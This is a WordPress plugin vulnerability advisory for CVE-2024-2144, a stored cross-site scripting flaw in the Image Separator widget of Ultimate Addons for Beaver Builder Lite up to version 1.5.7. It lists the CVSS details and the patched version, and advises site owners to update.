Ultimate Addons for Beaver Builder Vulnerability – Lite – Authenticated (Contributor+) Stored Cross-Site Scripting via Image Separator Widget – CVE-2024-2144 | WordPress Plugin Vulnerability Report
Plugin Name: Ultimate Addons for Beaver Builder – Lite
Key Information:
- Software Type: Plugin
- Software Slug: ultimate-addons-for-beaver-builder-lite
- Software Status: Active
- Software Author: brainstormforce
- Software Downloads: 499,391
- Active Installs: 30,000
- Last Updated: April 1, 2024
- Patched Versions: 1.5.8
- Affected Versions: <= 1.5.7
Vulnerability Details:
- Name: Ultimate Addons for Beaver Builder – Lite <= 1.5.7
- Type: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- CVE: CVE-2024-2144
- CVSS Score: 6.4
- Publicly Published: March 29, 2024
- Researcher: Francesco Carlucci
- Description: The Ultimate Addons for Beaver Builder – Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Separator widget in all versions up to, and including, 1.5.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Summary:
The Ultimate Addons for Beaver Builder – Lite for WordPress has a vulnerability in versions up to and including 1.5.7 that allows for Stored Cross-Site Scripting via the Image Separator widget. This vulnerability has been patched in version 1.5.8.
Detailed Overview:
Francesco Carlucci, a noted researcher, discovered the vulnerability. The core of the issue lies within the Image Separator widget, where insufficient input sanitization and output escaping lead to the injection of arbitrary web scripts. This vulnerability poses a significant risk as it allows attackers with at least contributor-level access to execute scripts that could compromise the security of the website. The prompt patching of this vulnerability in version 1.5.8 is a critical remediation step.
Advice for Users:
- Immediate Action: Update to version 1.5.8 immediately.
- Check for Signs of Vulnerability: Monitor your site for unusual activities or unauthorized content changes.
- Alternate Plugins: Consider alternative plugins with similar functionality as a precautionary measure.
- Stay Updated: Regularly update your plugins to the latest versions to mitigate the risks of vulnerabilities.
Conclusion:
The swift action by the developers of Ultimate Addons for Beaver Builder – Lite to release a patch for this vulnerability highlights the importance of maintaining up-to-date software. Users are strongly advised to upgrade to version 1.5.8 or later to secure their WordPress installations against this and similar vulnerabilities.